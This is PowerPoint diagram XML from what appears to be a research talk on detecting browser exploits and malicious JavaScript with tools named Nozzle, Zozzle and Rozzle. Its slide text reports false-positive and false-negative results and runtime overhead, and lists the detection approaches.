            </a:rPr>
            <a:t> 0 False Positives</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="26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10 popular AJAX-heavy sites</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="20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150 top Web sites</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1787356" y="0"/>
        <a:ext cx="6442243" cy="1414363"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6645CA92-980E-41D2-B5F3-E2072D6C6013}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="141436" y="141436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C8223-AC47-4B18-9618-E1811FA42B51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  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> 0 False Negatives</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="26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12 published heap spraying exploits and</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="20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2,000 synthetic rogue pages generated using </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" kern="1200" dirty="0" err="1" smtClean="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Metasploit</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1787356" y="1555799"/>
        <a:ext cx="6442243" cy="1414363"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DA1312B1-E36D-4993-ACDF-2299664C6124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AF71B8-0B36-4720-B756-66BDD334ECAD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+mj-lt"/>
              <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> Runtime Overhead</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="26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As high as 2x without sampling</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0">
            <a:latin typeface="+mj-lt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  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>5-10% with sampling</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1787356" y="3111599"/>
        <a:ext cx="6442243" cy="1414363"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{54C60950-B23B-4769-ACE5-1F976D1AA119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386096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701513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>
          <a:off x="-240606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 flipH="1">
          <a:off x="3104012" y="529283"/>
          <a:ext cx="858391" cy="858631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3598224" y="400095"/>
          <a:ext cx="2743200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        </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="48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Nozzle</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="48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598224" y="400095"/>
        <a:ext cx="2743200" cy="1117007"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ACA413BF-0915-4049-A5C9-7FD42C0186B3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3202953" y="1495163"/>
          <a:ext cx="1552400" cy="1552834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050606" y="1710814"/>
          <a:ext cx="2743200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5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    </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="5400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Zozzle</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4000" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4050606" y="1710814"/>
        <a:ext cx="2743200" cy="1117007"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{69074874-D740-4421-B6B9-9D999C367698}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3174024" y="3243835"/>
          <a:ext cx="718366" cy="718567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197622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Rozzle</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="40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197622" y="3049593"/>
        <a:ext cx="1544403" cy="11170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383688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699105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>
          <a:off x="-243014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 flipH="1">
          <a:off x="3101604" y="529283"/>
          <a:ext cx="858391" cy="858631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3595816" y="400095"/>
          <a:ext cx="2743200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        </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="48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Nozzle</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="48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595816" y="400095"/>
        <a:ext cx="2743200" cy="1117007"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ACA413BF-0915-4049-A5C9-7FD42C0186B3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3612498" y="1907230"/>
          <a:ext cx="728496" cy="728700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048198" y="1710814"/>
          <a:ext cx="2743200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54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    </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="4800" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Zozzle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048198" y="1710814"/>
        <a:ext cx="2743200" cy="1117007"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{69074874-D740-4421-B6B9-9D999C367698}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2790724" y="2862837"/>
          <a:ext cx="1480149" cy="1480563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3138619" y="3049593"/>
          <a:ext cx="3657595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8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 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="4800" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>     </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="6600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Rozzle</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4000" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3138619" y="3049593"/>
        <a:ext cx="3657595" cy="11170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685796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01213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>
          <a:off x="59092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3256007" y="381538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4497322" y="400095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Nozzle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97322" y="400095"/>
        <a:ext cx="1544403" cy="1117007"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ACA413BF-0915-4049-A5C9-7FD42C0186B3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3701954" y="1694520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949703" y="1710814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Zozzle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949703" y="1710814"/>
        <a:ext cx="1544403" cy="1117007"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{69074874-D740-4421-B6B9-9D999C367698}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3256007" y="3026058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497322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Rozzle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97322" y="3049593"/>
        <a:ext cx="1544403" cy="1117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685796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01213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>
          <a:off x="59092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3256007" y="381538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4497322" y="400095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Nozzle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97322" y="400095"/>
        <a:ext cx="1544403" cy="1117007"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ACA413BF-0915-4049-A5C9-7FD42C0186B3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3701954" y="1694520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949703" y="1710814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Zozzle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949703" y="1710814"/>
        <a:ext cx="1544403" cy="1117007"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{69074874-D740-4421-B6B9-9D999C367698}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3256007" y="3026058"/>
          <a:ext cx="1153798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497322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Rozzle</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4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97322" y="3049593"/>
        <a:ext cx="1544403" cy="1117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309C7-1899-4CD1-AA74-A540BAC8566E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1262110" y="1197569"/>
          <a:ext cx="2153872" cy="2153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577537" y="1513001"/>
        <a:ext cx="1523018" cy="1523041"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0DE43A99-7C6C-4AFE-A15E-723DD53E1CBA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="151422" y="0"/>
          <a:ext cx="4341496" cy="4525963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E55393-DFAB-43CB-91DC-24B58349D17D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3608493" y="717365"/>
          <a:ext cx="1153815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5263A7-8AC9-41D6-9BBB-456B0B592F19}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4857314" y="732300"/>
          <a:ext cx="1544462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500" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Instrument the browser</a:t>
          </a:r>
          <a:endParaRPr lang="en-U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57314" y="732300"/>
        <a:ext cx="1544462" cy="1117007"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{69074874-D740-4421-B6B9-9D999C367698}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3608493" y="2545401"/>
          <a:ext cx="1153815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B7EC6C-5DD7-4222-AC4E-791FD67CE7DD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4857314" y="2560337"/>
          <a:ext cx="1544462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500" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Find malicious behavior</a:t>
          </a:r>
          <a:endParaRPr lang="en-U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57314" y="2560337"/>
        <a:ext cx="1544462" cy="1117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685796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01213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 rot="900134">
          <a:off x="59092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3039128" y="164598"/>
          <a:ext cx="1587556" cy="1588000"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="tx2"/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4080804" y="400095"/>
          <a:ext cx="2377439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000" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>     </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="4800" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Nozzle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="3600" kern="1200" dirty="0" smtClean="0"/>
            <a:t>   </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4080804" y="400095"/>
        <a:ext cx="2377439" cy="1117007"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ACA413BF-0915-4049-A5C9-7FD42C0186B3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3919670" y="1912297"/>
          <a:ext cx="718366" cy="718567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949703" y="1710814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300" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Zozzle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="430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4949703" y="1710814"/>
        <a:ext cx="1544403" cy="1117007"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{69074874-D740-4421-B6B9-9D999C367698}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3473723" y="3243835"/>
          <a:ext cx="718366" cy="718567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497322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300" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Rozzle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="430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4497322" y="3049593"/>
        <a:ext cx="1544403" cy="1117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309C7-1899-4CD1-AA74-A540BAC8566E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1262110" y="1197569"/>
          <a:ext cx="2153872" cy="2153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577537" y="1513001"/>
        <a:ext cx="1523018" cy="1523041"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0DE43A99-7C6C-4AFE-A15E-723DD53E1CBA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="151422" y="0"/>
          <a:ext cx="4341496" cy="4525963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E55393-DFAB-43CB-91DC-24B58349D17D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3608493" y="717365"/>
          <a:ext cx="1153815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5263A7-8AC9-41D6-9BBB-456B0B592F19}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4857314" y="732300"/>
          <a:ext cx="1544462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900" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Classify JavaScript code statically</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="19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57314" y="732300"/>
        <a:ext cx="1544462" cy="1117007"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{69074874-D740-4421-B6B9-9D999C367698}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3608493" y="2545401"/>
          <a:ext cx="1153815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B7EC6C-5DD7-4222-AC4E-791FD67CE7DD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4857314" y="2560337"/>
          <a:ext cx="1544462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900" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Find malicious patterns</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="19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57314" y="2560337"/>
        <a:ext cx="1544462" cy="11170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500398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815815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>
          <a:off x="-126305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3234622" y="545596"/>
          <a:ext cx="825773" cy="82600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4311924" y="400095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600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> Nozzle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="3600" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>   </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4311924" y="400095"/>
        <a:ext cx="1544403" cy="1117007"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ACA413BF-0915-4049-A5C9-7FD42C0186B3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3393434" y="1571358"/>
          <a:ext cx="1400041" cy="1400444"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="tx2"/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393509" y="1710814"/>
          <a:ext cx="2285995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800" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>   </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="5400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Zozzle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="430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4393509" y="1710814"/>
        <a:ext cx="2285995" cy="1117007"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{69074874-D740-4421-B6B9-9D999C367698}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3288325" y="3243835"/>
          <a:ext cx="718366" cy="718567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311924" y="3049593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300" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Rozzle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="430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4311924" y="3049593"/>
        <a:ext cx="1544403" cy="1117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309C7-1899-4CD1-AA74-A540BAC8566E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1262110" y="1197569"/>
          <a:ext cx="2153872" cy="2153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577537" y="1513001"/>
        <a:ext cx="1523018" cy="1523041"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0DE43A99-7C6C-4AFE-A15E-723DD53E1CBA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="151422" y="0"/>
          <a:ext cx="4341496" cy="4525963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E55393-DFAB-43CB-91DC-24B58349D17D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3608493" y="717365"/>
          <a:ext cx="1153815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5263A7-8AC9-41D6-9BBB-456B0B592F19}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4857314" y="732300"/>
          <a:ext cx="1544462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500" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Detect cloaking malware</a:t>
          </a:r>
          <a:endParaRPr lang="en-U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57314" y="732300"/>
        <a:ext cx="1544462" cy="1117007"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{69074874-D740-4421-B6B9-9D999C367698}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3608493" y="2545401"/>
          <a:ext cx="1153815" cy="115412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B7EC6C-5DD7-4222-AC4E-791FD67CE7DD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4857314" y="2560337"/>
          <a:ext cx="1544462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500" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Unmask it to detect more</a:t>
          </a:r>
          <a:endParaRPr lang="en-US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57314" y="2560337"/>
        <a:ext cx="1544462" cy="11170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48C75-D016-4F08-9F51-B3D240ACF8EC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="685796" y="1197569"/>
          <a:ext cx="2153799" cy="2153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001213" y="1513001"/>
        <a:ext cx="1522965" cy="1523041"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{170CD44F-31FA-458A-99A0-9DA364AC4E8D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="20714079">
          <a:off x="59092" y="0"/>
          <a:ext cx="4341704" cy="452596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8C0AC3-421E-4976-8531-27C2CAAC5D6E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3420020" y="545596"/>
          <a:ext cx="825773" cy="826004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B8372-1AC1-4C30-9C91-27561FA2BC32}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4290650" y="400095"/>
          <a:ext cx="1957747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600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> N</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="4000" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>ozzle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="3600" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>   </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4290650" y="400095"/>
        <a:ext cx="1957747" cy="1117007"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ACA413BF-0915-4049-A5C9-7FD42C0186B3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3909505" y="1902129"/>
          <a:ext cx="738696" cy="738902"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse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586B4C-DC6C-42F1-8E4D-88C4E6336CBF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4949703" y="1710814"/>
          <a:ext cx="1544403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4400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Zozzle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="440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4949703" y="1710814"/>
        <a:ext cx="1544403" cy="1117007"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{69074874-D740-4421-B6B9-9D999C367698}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3169011" y="2939038"/>
          <a:ext cx="1327790" cy="1328161"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="tx2"/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E1C02D-E7D5-45FC-B787-772B2C997025}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4126526" y="3049593"/>
          <a:ext cx="2285995" cy="11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5400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>  Rozzle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="4300" kern="1200" dirty="0" smtClean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4126526" y="3049593"/>
        <a:ext cx="2285995" cy="11170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29513-A1D5-4D77-8C66-88C889C62D52}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1096415" y="1075334"/>
          <a:ext cx="1933961" cy="19340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Memory-based</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2600" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2600" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>exploits</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2600" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1379637" y="1358570"/>
        <a:ext cx="1367517" cy="1367585"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CE6F23F4-00BC-40E5-87D3-955B84FFD8B0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="99098" y="0"/>
          <a:ext cx="3898548" cy="40640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04882-DD14-4BA4-88D4-4CE7C8D52CD2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2969706" y="342595"/>
          <a:ext cx="1036030" cy="1036320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5D067-3D1F-4EA7-A229-15A6123FB46D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2491701" y="359257"/>
          <a:ext cx="4572003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300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>      </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2300" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>2000</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>       </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2300" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Stack-based</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2300" kern="1200" dirty="0" smtClean="0"/>
            <a:t> overruns</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2491701" y="359257"/>
        <a:ext cx="4572003" cy="1002995"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FAD35638-A429-4DD1-BB50-A83F5A823278}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3370135" y="1521561"/>
          <a:ext cx="1036030" cy="1036320"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse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381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0A3A6-79AD-4272-9C48-7820D3E1CBCD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2897908" y="1536192"/>
